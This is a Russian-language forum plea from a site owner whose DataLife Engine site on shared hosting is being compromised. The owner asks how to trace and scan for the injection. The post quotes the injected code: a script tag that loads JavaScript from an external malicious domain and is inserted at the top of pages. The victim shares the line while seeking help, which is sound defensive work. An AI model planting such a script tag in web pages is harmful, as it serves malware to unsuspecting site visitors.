Бразы помогите, сабж, ломают сайт один на dle, суют хрень в него и в другие сайты на том же хосте.
шаред хост, логи хранятся только за сегодня, по датам редактирования файлов перерыл все - все чисто.
index.php и файлы шаблонов чистые. но!- вставляется в самом начале страниц такая хрень:
Код:
<nofollow><script language='JavaScript' src=http://37mem4yv28.bestfree.pw/infob.php?i=25659></script></nofollow>
динамика - меняется линк несколько раз в стуки.
я так понял на лету вставляется, вот только откуда - вопрос
хтацесс тоже чист...
чем можно отследить откуда подгружается? или просканить чем?
помогите
спасибо